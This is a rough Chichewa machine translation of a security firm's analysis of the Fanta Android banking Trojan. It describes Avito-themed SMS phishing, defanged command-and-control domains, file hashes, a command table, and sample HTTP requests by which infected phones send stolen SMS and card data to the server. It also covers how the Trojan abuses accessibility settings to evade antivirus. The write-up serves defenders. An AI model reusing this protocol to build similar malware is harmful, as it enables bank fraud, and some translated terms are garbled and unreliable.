Pulogalamu ya ProHoster > Blog > nkhani zapaintaneti > Leisya, Fanta: njira zatsopano za Trojan yakale ya Android

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android

Tsiku lina mukufuna kugulitsa chinachake pa Avito ndipo, mutalemba tsatanetsatane wa malonda anu (mwachitsanzo, gawo la RAM), mudzalandira uthenga uwu:

Leisya, Fanta: njira zatsopano za Trojan yakale ya AndroidMukatsegula ulalo, muwona tsamba lowoneka ngati lopanda vuto kukudziwitsani, wogulitsa wokondwa komanso wopambana, kuti mwagula:

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android
Mukangodina batani la "Pitirizani", fayilo ya APK yokhala ndi chithunzi ndi dzina lolimbikitsa idzatsitsidwa ku chipangizo chanu cha Android. Mudayika pulogalamu yomwe pazifukwa zina idapempha ufulu wa AccessibilityService, kenako mazenera angapo adawonekera ndikuzimiririka mwachangu ndipo... Ndi momwemo.

Mumapita kukawona momwe mulili, koma pazifukwa zina pulogalamu yanu yakubanki imakufunsanso zambiri zamakhadi anu. Mukalowa mu data, chinthu choyipa chimachitika: pazifukwa zina simunadziwebe, ndalama zimayamba kutha ku akaunti yanu. Mukuyesera kuthetsa vutoli, koma foni yanu ikukana: ikanikiza makiyi a "Kubwerera" ndi "Home", sichizimitsa ndipo sichikulolani kuti mutsegule njira zotetezera. Chotsatira chake, mwasiyidwa opanda ndalama, katundu wanu sanagulidwe, mukusokonezeka ndikudabwa: chinachitika ndi chiyani?

Yankho ndi losavuta: mwakhala wozunzidwa ndi Android Trojan Fanta, membala wa banja la Flexnet. Kodi zimenezi zinachitika bwanji? Tiyeni tifotokoze tsopano.

Olemba: Andrey Polovinkin, katswiri wamkulu pakusanthula pulogalamu yaumbanda, Ivan Pisarev, katswiri wofufuza zaumbanda.

Ziwerengero zina

Banja la Flexnet la Android Trojans lidadziwika koyamba mu 2015. Kwa nthawi yayitali yogwira ntchito, banjali linakula mpaka kumagulu angapo: Fanta, Limebot, Lipton, ndi zina zotero. Trojan, komanso zomangamanga zomwe zikugwirizana nazo, siziyima: njira zatsopano zogawanitsa zikupangidwa - kwa ife, masamba apamwamba kwambiri achinyengo omwe amayang'ana kwa ogulitsa ena, ndipo oyambitsa Trojan amatsatira mafashoni apamwamba. kulemba kwa virus - ndikuwonjezera magwiridwe antchito atsopano omwe amathandizira kuba bwino ndalama pazida zomwe zili ndi kachilombo ndikudutsa njira zodzitetezera.

Kampeni yomwe yafotokozedwa m'nkhaniyi ikuyang'ana ogwiritsa ntchito ochokera ku Russia; zida zochepa zomwe zili ndi kachilombo zidajambulidwa ku Ukraine, komanso zocheperako ku Kazakhstan ndi Belarus.

Ngakhale Flexnet yakhala m'bwalo la Android Trojan kwa zaka zoposa 4 tsopano ndipo yaphunziridwa mwatsatanetsatane ndi ofufuza ambiri, idakali bwino. Kuyambira Januwale 2019, kuwonongeka komwe kungachitike ndi ma ruble opitilira 35 miliyoni - ndipo izi ndi za kampeni ku Russia kokha. Mu 2015, mitundu yosiyanasiyana ya Trojan iyi ya Android idagulitsidwa pamabwalo apansi panthaka, pomwe magwero a Trojan okhala ndi kufotokozera mwatsatanetsatane atha kupezekanso. Izi zikutanthauza kuti ziwerengero za kuwonongeka padziko lapansi ndizochititsa chidwi kwambiri. Osati chizindikiro choipa kwa munthu wokalamba wotero, sichoncho?

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android

Kuchokera kugulitsa kupita kuchinyengo

Monga tikuwonera pazithunzi zomwe zidawonetsedwa kale patsamba laphishing pa intaneti yotumizira zotsatsa za Avito, zidakonzedwa kwa wozunzidwa. Mwachiwonekere, owukirawo amagwiritsa ntchito imodzi mwazojambula za Avito, zomwe zimatulutsa nambala ya foni ndi dzina la wogulitsa, komanso kufotokozera kwa mankhwala. Pambuyo pakukulitsa tsambalo ndikukonzekera fayilo ya APK, wozunzidwayo amatumizidwa SMS ndi dzina lake ndi chiyanjano ku tsamba lachinyengo lomwe lili ndi kufotokozera za mankhwala ake ndi ndalama zomwe analandira kuchokera ku "kugulitsa" kwa mankhwala. Podina batani, wogwiritsa amalandira fayilo yoyipa ya APK - Fanta.

Kafukufuku wa shcet491[.]ru domain adawonetsa kuti idaperekedwa ku ma seva a Hostinger's DNS:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Fayilo ya zone ya domeni ili ndi zolemba zoloza ku ma adilesi a IP 31.220.23[.]236, 31.220.23[.]243, ndi 31.220.23[.]235. Komabe, mbiri yakale yachidziwitso (A Record) imaloza ku seva yokhala ndi adilesi ya IP 178.132.1[.]240.

IP adilesi 178.132.1[.]240 ili ku Netherlands ndipo ndi ya hoster Zithunzi za WorldStream. Maadiresi a IP 31.220.23[.]235, 31.220.23[.]236 ndi 31.220.23[.]243 ali ku UK ndipo ndi a seva yogawana nawo HOSTINGER. Amagwiritsidwa ntchito ngati chojambulira openprov-ru. Madomeni otsatirawa adatsimikizanso ku adilesi ya IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Tiyenera kudziwa kuti maulalo amtundu wotsatirawa analipo kuchokera pafupifupi madomeni onse:

http://(www.){0,1}<%domain%>/[0-9]{7}

Template iyi ilinso ndi ulalo wochokera ku uthenga wa SMS. Kutengera ndi mbiri yakale, zidapezeka kuti dera limodzi likufanana ndi maulalo angapo panjira yomwe tafotokozazi, zomwe zikuwonetsa kuti dera limodzi lidagwiritsidwa ntchito kugawa Trojan kwa ozunzidwa angapo.

Tiyeni tidumphire patsogolo pang'ono: Trojan yotsitsidwa kudzera pa ulalo wa SMS imagwiritsa ntchito adilesiyo ngati seva yowongolera. onuseseddohap[.]kalabu. Domeni iyi idalembetsedwa pa 2019-03-12, ndipo kuyambira 2019-04-29, mapulogalamu a APK adalumikizana ndi domeni iyi. Kutengera zomwe zapezedwa kuchokera ku VirusTotal, mapulogalamu onse a 109 adalumikizana ndi seva iyi. Domeni yokhayo idakhazikika ku adilesi ya IP 217.23.14[.]27, yomwe ili ku Netherlands ndipo ili ndi hoster Zithunzi za WorldStream. Amagwiritsidwa ntchito ngati chojambulira dzinacheap. Madomeni adagwirizananso ndi adilesi ya IP iyi bad-racoon[.]kalabu (kuyambira 2018-09-25) ndi bad-racoon[.]live (kuyambira 2018-10-25). Ndi domain bad-racoon[.]kalabu oposa 80 APK owona kucheza nawo bad-racoon[.]live - oposa 100.

Kawirikawiri, kuukira kumachitika motere:

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android

Kodi pansi pa chivindikiro cha Fanta ndi chiyani?

Mofanana ndi ma Trojans ena ambiri a Android, Fanta amatha kuwerenga ndi kutumiza mauthenga a SMS, kupanga zopempha za USSD, ndikuwonetsa mazenera ake pamwamba pa mapulogalamu (kuphatikizapo mabanki). Komabe, zida zogwirira ntchito za banja ili zafika: Fanta adayamba kugwiritsa ntchito Accessibility Service pazifukwa zosiyanasiyana: kuwerenga zomwe zili m'zidziwitso kuchokera kuzinthu zina, kupewa kuzindikirika ndikuyimitsa kuphedwa kwa Trojan pa chipangizo chomwe chili ndi kachilombo, ndi zina zambiri. Fanta imagwira ntchito pamitundu yonse ya Android osachepera 4.4. M'nkhaniyi tiwona mwatsatanetsatane zitsanzo zotsatirazi za Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Mwamsanga pambuyo kukhazikitsa

Atangoyambitsa, Trojan imabisa chithunzi chake. Pulogalamuyi imatha kugwira ntchito ngati dzina la chipangizocho lilibe pamndandanda:

  • anayankha
  • Virtualbox
  • Nexus 5X (bullhead)
  • Nexus 5 (lumo)

Cheke ichi chikuchitika muutumiki waukulu wa Trojan - MainService. Ikakhazikitsidwa koyamba, zosintha za pulogalamuyo zimakhazikitsidwa kuti zikhale zokhazikika (mawonekedwe osungira zosintha ndi tanthauzo lake zidzakambidwa pambuyo pake), ndipo chida chatsopano chomwe chili ndi kachilombo chimalembetsedwa pa seva yowongolera. Pempho la HTTP POST lokhala ndi mtundu wa uthenga lidzatumizidwa ku seva register_bot ndi chidziwitso cha chipangizo chomwe chili ndi kachilombo (mtundu wa Android, IMEI, nambala yafoni, dzina la opareshoni ndi nambala yadziko yomwe wogwiritsa ntchitoyo adalembetsa). Adilesi imagwira ntchito ngati seva yowongolera hXXp://onuseseddohap[.]club/controller.php. Poyankha, seva imatumiza uthenga womwe uli ndi minda bot_id, bot_pwd, seva - pulogalamuyi imasunga izi ngati magawo a seva ya CnC. Parameter seva kusankha ngati gawo silinalandidwe: Fanta amagwiritsa ntchito adilesi yolembetsa - hXXp://onuseseddohap[.]club/controller.php. Ntchito yosinthira adilesi ya CnC ingagwiritsidwe ntchito kuthetsa mavuto awiri: kugawa katunduyo mofanana pakati pa ma seva angapo (ngati pali zida zambiri zomwe zili ndi kachilombo, katundu pa seva yosasinthika akhoza kukhala wamkulu), komanso kugwiritsa ntchito. seva ina pakagwa kulephera kwa seva imodzi ya CnC.

Ngati cholakwika chikachitika potumiza pempho, Trojan idzabwereza kulembetsa pambuyo pa masekondi 20.

Chidachi chikalembetsedwa bwino, Fanta iwonetsa uthenga wotsatirawu kwa wogwiritsa ntchito:

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android
Zofunika kudziwa: utumiki wayitana Chitetezo chadongosolo - dzina la ntchito ya Trojan, ndipo mutadina batani CHABWINO Zenera lidzatsegulidwa ndi zoikamo za Kufikika kwa chipangizo chomwe chili ndi kachilombo, pomwe wogwiritsa ntchito ayenera kupereka ufulu Wopezeka pa ntchito yoyipa:

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android
Wogwiritsa ntchito akangoyatsa Accessibility Service, Fanta amapeza zomwe zili m'mawindo ogwiritsira ntchito ndi machitidwe omwe amachitidwa mwa iwo:

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android
Itangolandira ufulu Wopezeka, Trojan imapempha ufulu wa woyang'anira ndi ufulu wowerenga zidziwitso:

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android
Pogwiritsa ntchito AccessibilityService, pulogalamuyi imatsanzira makiyi, potero imadzipatsa ufulu wonse wofunikira.

Fanta imapanga zochitika zingapo za database (zomwe zidzafotokozedwe mtsogolo) zofunika kuti zisungidwe zosintha komanso zidziwitso zomwe zasonkhanitsidwa pokhudzana ndi chipangizo chomwe chili ndi kachilomboka. Kuti atumize zambiri zomwe zasonkhanitsidwa, Trojan imapanga ntchito yobwerezabwereza yokonzedwa kutsitsa minda kuchokera ku database ndikulandira lamulo kuchokera ku seva yolamulira. Nthawi yofikira ku CnC imayikidwa kutengera mtundu wa Android: ngati 5.1, nthawiyo idzakhala masekondi 10, apo ayi masekondi 60.

Kuti alandire lamuloli, Fanta apempha GetTask ku seva yoyang'anira. Poyankha, CnC ikhoza kutumiza limodzi mwamalamulo awa:

timu mafotokozedwe
0 Tumizani uthenga wa SMS
1 Imbani foni kapena lamulo la USSD
2 Kusintha parameter mpata
3 Kusintha parameter sungani
6 Kusintha parameter smsManager
9 Yambani kusonkhanitsa mauthenga a SMS
11 Bwezerani foni yanu ku zoikamo za fakitale
12 Yambitsani/Zimitsani kudula mitengo ya bokosi la zokambirana

Fanta imasonkhanitsanso zidziwitso kuchokera ku mapulogalamu 70 aku banki, njira zolipirira mwachangu ndi ma e-wallet ndikuzisunga mu database.

Kusunga zosinthika magawo

Kusunga magawo osinthira, Fanta amagwiritsa ntchito njira yokhazikika papulatifomu ya Android - Sankhani Izi- mafayilo. Zokonda zidzasungidwa ku fayilo yotchedwa zoikamo. Kufotokozera kwa magawo osungidwa kuli mu tebulo ili m'munsimu.

dzina Mtengo wofikira Mfundo zomwe zingatheke mafotokozedwe
id 0 Zambiri Bot ID
seva hXXp://onuseseddohap[.]kalabu/ ulalo Sinthani adilesi ya seva
pwd - Mzere Chinsinsi cha seva
mpata 20 Zambiri Nthawi yosiyana. Imawonetsa kuti ntchito zotsatirazi ziyenera kuchedwetsedwa nthawi yayitali bwanji:

  • Mukatumiza pempho la momwe mungatumizire uthenga wa SMS
  • Kulandira lamulo latsopano kuchokera ku seva yoyang'anira
sungani onse zonse/teleNumber Ngati munda uli wofanana ndi chingwe onse kapena telefoni, ndiye uthenga wa SMS womwe walandilidwa udzalandidwa ndi pulogalamuyo ndipo osawonetsedwa kwa wogwiritsa ntchito
smsManager 0 0/1 Yambitsani/zimitsani pulogalamuyi ngati wolandila wa SMS
werenganiDialog zabodza Zoona/zabodza Yambitsani/Zimitsani kudula mitengo AccessibilityEvent

Fanta amagwiritsanso ntchito fayilo smsManager:

dzina Mtengo wofikira Mfundo zomwe zingatheke mafotokozedwe
pckg - Mzere Dzina la meseji ya SMS yomwe yagwiritsidwa ntchito

Kulumikizana ndi database

Panthawi yogwira ntchito, Trojan amagwiritsa ntchito nkhokwe ziwiri. Database yotchulidwa a amagwiritsidwa ntchito kusungira zambiri zomwe zasonkhanitsidwa kuchokera pafoni. Nawonso database yachiwiri imatchedwa fanta.db ndipo imagwiritsidwa ntchito kusunga zoikamo zomwe zimapanga mazenera achinyengo opangidwa kuti atole zambiri zamakhadi aku banki.

Trojan amagwiritsa ntchito database а kusunga zomwe mwasonkhanitsa ndikulemba zochita zanu. Deta imasungidwa mu tebulo zipika. Kuti mupange tebulo, gwiritsani ntchito funso ili la SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Nawonso database ili ndi izi:

1. Logging chiyambi cha kachilombo chipangizo ndi uthenga Foni inayatsa!

2. Zidziwitso zochokera ku mapulogalamu. Uthengawu umapangidwa molingana ndi template iyi:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Makhadi a banki kuchokera ku mafomu achinyengo opangidwa ndi Trojan. Parameter VIEW_NAME ikhoza kukhala imodzi mwa izi:

  • AliExpress
  • Avito
  • Google Play
  • Zosiyanasiyana <%App Name%>

Uthengawu walowetsedwa mumpangidwe:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Mauthenga a SMS obwera/otuluka mumpangidwe:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Zambiri za phukusi lomwe limapanga bokosi la zokambirana mumpangidwe:

(<%Package name%>)<%Package information%>

Chitsanzo tebulo zipika:

Leisya, Fanta: njira zatsopano za Trojan yakale ya Android
Chimodzi mwazochita za Fanta ndikusonkhanitsa zambiri zamakhadi aku banki. Kusonkhanitsa deta kumachitika kudzera mukupanga mazenera a phishing mukatsegula mapulogalamu akubanki. Trojan imapanga zenera la phishing kamodzi kokha. Zambiri zomwe zenera zidawonetsedwa kwa wogwiritsa ntchito zimasungidwa patebulo zoikamo mu nkhokwe fanta.db. Kuti mupange database, gwiritsani ntchito funso ili la SQL:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Magawo onse a tebulo zoikamo mwachisawawa adayambitsidwa ku 1 (pangani zenera lachinyengo). Wogwiritsa ntchito akalowetsa deta yawo, mtengowo udzakhazikitsidwa ku 0. Chitsanzo cha minda ya tebulo zoikamo:

  • akhoza_kulowa - malowa ali ndi udindo wowonetsa fomuyo potsegula mafomu ofunsira kubanki
  • choyamba_banki - osagwiritsidwa ntchito
  • akhoza_avito - gawoli liri ndi udindo wowonetsa mawonekedwe potsegula pulogalamu ya Avito
  • akhoza_ali - gawoli liri ndi udindo wowonetsa mawonekedwe potsegula pulogalamu ya Aliexpress
  • akhoza_china - gawoli liri ndi udindo wowonetsa fomu mukatsegula pulogalamu iliyonse pamndandanda: Yula, Pandao, Drom Auto, Wallet. Makhadi ochotsera ndi bonasi, Aviasales, Kusungitsa, Trivago
  • can_card - gawoli liri ndi udindo wowonetsa mawonekedwe potsegula Google Play

Kuyanjana ndi seva yoyang'anira

Kulumikizana kwa intaneti ndi seva yoyang'anira kumachitika kudzera pa protocol ya HTTP. Kuti agwire ntchito ndi netiweki, Fanta amagwiritsa ntchito laibulale yotchuka ya Retrofit. Zopempha zimatumizidwa kwa: hXXp://onuseseddohap[.]club/controller.php. Adilesi ya seva ikhoza kusinthidwa polembetsa pa seva. Ma cookie atha kutumizidwa kuchokera ku seva. Fanta amapempha zotsatirazi kwa seva:

  • Kulembetsa kwa bot pa seva yowongolera kumachitika kamodzi, pakuyambitsa koyamba. Zambiri zokhuza chipangizo chomwe zakhudzidwa zimatumizidwa ku seva:
    · keke - makeke olandilidwa kuchokera ku seva (mtengo wokhazikika ndi chingwe chopanda kanthu)
    · mode - chingwe chosasintha register_bot
    · manambala oyamba - zosasintha 2
    · mtundu_sdk - imapangidwa molingana ndi template iyi: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI ya chipangizo kachilombo
    · dziko - kachidindo kadziko komwe wogwiritsa ntchitoyo adalembetsedwa, mumtundu wa ISO
    · nambala - nambala yafoni
    · Woyankha - dzina la opareta

    Chitsanzo cha pempho lotumizidwa ku seva:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Poyankha pempholi, seva iyenera kubweza chinthu cha JSON chokhala ndi magawo awa:
    · bot_id - ID ya chipangizo chomwe chili ndi kachilomboka. Ngati bot_id ndi yofanana ndi 0, Fanta adzaperekanso pempholo.
    bot_pwd - mawu achinsinsi a seva.
    seva - adilesi ya seva yowongolera. Zosankha za parameter. Ngati chizindikirocho sichinatchulidwe, adilesi yomwe yasungidwa mu pulogalamuyi idzagwiritsidwa ntchito.

    Chitsanzo cha JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Pemphani kuti mulandire lamulo kuchokera kwa seva. Zotsatirazi zimatumizidwa ku seva:
    · keke - makeke adalandira kuchokera ku seva
    · mpikisano - ID ya chipangizo chomwe chili ndi kachilomboka chomwe chidalandiridwa potumiza pempho register_bot
    · pwd - mawu achinsinsi a seva
    · divice_admin - gawolo limatsimikizira ngati ufulu wa otsogolera wapezedwa. Ngati ufulu wotsogolera wapezedwa, gawolo ndi lofanana ndi 1, mwinamwake 0
    · screen - Kufikika Service ntchito udindo. Ngati ntchitoyo idayambitsidwa, mtengo wake ndi 1, mwinamwake 0
    · Mtsogoleri wa SMS - ikuwonetsa ngati Trojan yayatsidwa ngati pulogalamu yokhazikika yolandila SMS
    · yotchinga - ikuwonetsa momwe skrini ilili. Mtengo udzakhazikitsidwa 1, ngati chinsalu chilipo, mwinamwake 0;

    Chitsanzo cha pempho lotumizidwa ku seva:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Kutengera ndi lamulo, seva imatha kubweza chinthu cha JSON chokhala ndi magawo osiyanasiyana:

    · timu Tumizani uthenga wa SMS: Magawo ali ndi nambala yafoni, mawu a uthenga wa SMS ndi ID ya uthenga womwe ukutumizidwa. Chizindikiritso chimagwiritsidwa ntchito potumiza uthenga ku seva ndi mtundu setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · timu Imbani foni kapena lamulo la USSD: Nambala ya foni kapena lamulo limabwera mumagulu oyankha. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · timu Sinthani parameter ya interval. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · timu Sinthani parameter ya intercept. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · timu Sinthani gawo la SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · timu Sungani mauthenga a SMS kuchokera ku chipangizo chomwe chili ndi kachilomboka.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · timu Bwezerani foni yanu ku zoikamo za fakitale: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · timu Sinthani magawo a ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Kutumiza uthenga ndi mtundu setSmsStatus. Pempholi limapangidwa lamuloli litaperekedwa Tumizani uthenga wa SMS. Pempho likuwoneka motere:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Kukweza zomwe zili mu database. Mzere umodzi umatumizidwa pa pempho lililonse. Zotsatirazi zimatumizidwa ku seva:
    · keke - makeke adalandira kuchokera ku seva
    · mode - chingwe chosasintha setSaveInboxSms
    · mpikisano - ID ya chipangizo chomwe chili ndi kachilomboka chomwe chidalandiridwa potumiza pempho register_bot
    · lemba - zolemba zomwe zili muzolemba zamakono (munda d kuchokera patebulo zipika mu nkhokwe а)
    · nambala - dzina la rekodi yaposachedwa ya database (munda p kuchokera patebulo zipika mu nkhokwe а)
    · sms_mode - mtengo wathunthu (munda m kuchokera patebulo zipika mu nkhokwe а)

    Pempho likuwoneka motere:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Ngati atatumizidwa bwino ku seva, mzerewo udzachotsedwa patebulo. Chitsanzo cha chinthu cha JSON chobwezedwa ndi seva:

    {
    "response":[],
    "status":"ok"
}

Kulumikizana ndi AccessibilityService

AccessibilityService idakhazikitsidwa kuti zida za Android zikhale zosavuta kugwiritsa ntchito kwa anthu olumala. Nthawi zambiri, kulumikizana kwathupi kumafunika kuti mugwirizane ndi pulogalamuyo. AccessibilityService imakulolani kuti muzichita mwadongosolo. Fanta amagwiritsa ntchito ntchitoyi kuti apange mawindo abodza pamabanki ndikuletsa ogwiritsa ntchito kutsegula zoikamo ndi mapulogalamu ena.

Pogwiritsa ntchito magwiridwe antchito a AccessibilityService, Trojan imayang'anira kusintha kwa zinthu zomwe zili pazenera la chipangizocho. Monga tafotokozera kale, makonda a Fanta ali ndi gawo lomwe limayang'anira ntchito zodula mitengo ndi ma dialog box - werenganiDialog. Ngati parameter iyi yakhazikitsidwa, zambiri za dzina ndi kufotokozera za phukusi lomwe lidayambitsa chochitikacho lidzawonjezedwa ku database. Trojan imachita zotsatirazi zochitika zikayamba:

  • Imafananiza kukanikiza makiyi akumbuyo ndi akunyumba muzochitika zotsatirazi:
    · ngati wosuta akufuna kuyambitsanso chipangizo chake
    · ngati wosuta akufuna kuchotsa ntchito "Avito" kapena kusintha ufulu mwayi
    · ngati pali kutchulidwa kwa "Avito" ntchito pa tsamba
    · mukatsegula pulogalamu ya Google Play Protect
    · potsegula masamba okhala ndi zokonda za AccessibilityService
    · pamene System Security dialog box ikuwonekera
    · potsegula tsambalo ndi zoikamo za "Draw over other app".
    · potsegula tsamba la "Mapulogalamu", "Kubwezeretsa ndi kukonzanso", "Kubwezeretsanso deta", "Bwezeretsani makonda", "Madivelopa gulu", "Special. mwayi”, “Mwayi wapadera”, “Ufulu wapadera”
    · ngati chochitikacho chinapangidwa ndi mapulogalamu ena.

    Mndandanda wamapulogalamu

    • Android
    • Master Lite
    • Oyera Woyera
    • Clean Master kwa x86 CPU
    • Meizu Application Permission Management
    • Chitetezo cha MIUI
    • Clean Master - Antivayirasi & Cache ndi Zotsukira Zinyalala
    • Kuwongolera kwa Makolo ndi GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivayirasi & chitetezo chaulere 2019
    • Mobile Security MegaFon
    • Chitetezo cha AVG cha Xperia
    • Mobile Security
    • Malwarebytes Antivirus & Chitetezo
    • Antivirus ya Android 2019
    • Security Master - Antivayirasi, VPN, AppLock, Booster
    • AVG antivayirasi kwa Huawei piritsi System Manager
    • Kupezeka kwa Samsung
    • Samsung Smart Manager
    • Chitetezo Master
    • Kuthamanga Kwambiri
    • Dr. Web
    • Dr. Web Web Space
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivayirasi & Mobile Security
    • Kaspersky Internet Security: Antivayirasi ndi Chitetezo
    • Moyo wa Battery wa Kaspersky: Saver & Booster
    • Kaspersky Endpoint Security - chitetezo ndi kasamalidwe
    • AVG Antivirus yaulere 2019 - Chitetezo cha Android
    • Antivirus Android
    • Norton Mobile Security ndi Antivirus
    • Antivayirasi, firewall, VPN, chitetezo cham'manja
    • Mobile Security: antivayirasi, VPN, chitetezo chakuba
    • Antivirus kwa Android

  • Ngati chilolezo chikupemphedwa potumiza uthenga wa SMS ku nambala yaifupi, Fanta amayesa kudina pabokosi loyang'anira Kumbukirani kusankha ndi batani tumizani.
  • Mukayesa kuchotsa ufulu wa oyang'anira ku Trojan, imatseka foni.
  • Imaletsa kuwonjezera oyang'anira atsopano.
  • Ngati antivayirasi ntchito dr.web atazindikira chowopsa, Fanta amatsanzira kukanikiza batani nyalanyaza.
  • Trojan imayerekezera kukanikiza batani lakumbuyo ndi lakunyumba ngati chochitikacho chidapangidwa ndi pulogalamuyi Samsung Chipangizo Care.
  • Fanta amapanga mazenera achinyengo ndi mafomu olembera zambiri zamakhadi aku banki ngati pulogalamu yochokera pamndandanda wamitundu 30 ya intaneti idakhazikitsidwa. Zina mwazo: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.

    Mafomu a phishing

    Fanta amasanthula mapulogalamu omwe akuyenda pa chipangizo chomwe chili ndi kachilomboka. Ngati kugwiritsa ntchito chidwi kudatsegulidwa, Trojan ikuwonetsa zenera la phishing pamwamba pa ena onse, omwe ndi mawonekedwe olowera zambiri zamakhadi aku banki. Wogwiritsa akuyenera kuyika izi:

    • Nambala yakhadi
    • Tsiku lotha ntchito
    • CVV
    • Dzina lamwini makhadi (osati mabanki onse)

    Kutengera ndikugwiritsa ntchito, mazenera osiyanasiyana a phishing adzawonetsedwa. M'munsimu muli zitsanzo za ena mwa iwo:

    AliExpress:

    Leisya, Fanta: njira zatsopano za Trojan yakale ya Android
    Avito:

    Leisya, Fanta: njira zatsopano za Trojan yakale ya Android
    Kwa mapulogalamu ena, mwachitsanzo. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: njira zatsopano za Trojan yakale ya Android

    Momwe izo zinaliri kwenikweni

    Mwamwayi, munthu amene adalandira uthenga wa SMS womwe wafotokozedwa kumayambiriro kwa nkhaniyi adakhala katswiri wachitetezo cha pa intaneti. Chifukwa chake, mawonekedwe enieni, omwe si otsogolera amasiyana ndi omwe adanenedwa kale: munthu adalandira SMS yosangalatsa, pambuyo pake adapereka gulu la Gulu-IB Threat Hunting Intelligence. Zotsatira za kuukira ndi nkhaniyi. Mapeto abwino, sichoncho? Komabe, si nkhani zonse zomwe zimathera bwino kwambiri, ndipo kotero kuti zanu sizikuwoneka ngati zodulidwa za wotsogolera ndi kutaya ndalama, nthawi zambiri zimakhala zokwanira kumamatira ku malamulo omwe afotokozedwa kwa nthawi yaitali:

    • osayika mapulogalamu a foni yam'manja yokhala ndi Android OS kuchokera kwina kulikonse kupatula Google Play
    • Mukakhazikitsa pulogalamu, samalani kwambiri zaufulu womwe mwafunsidwa
    • tcherani khutu pazowonjezera za mafayilo otsitsidwa
    • khazikitsani zosintha za Android OS pafupipafupi
    • osayendera zinthu zokayikitsa ndipo musatsitse mafayilo kuchokera pamenepo
    • Osadina maulalo olandilidwa mu mauthenga a SMS.

Source: www.habr.com

Kuwonjezera ndemanga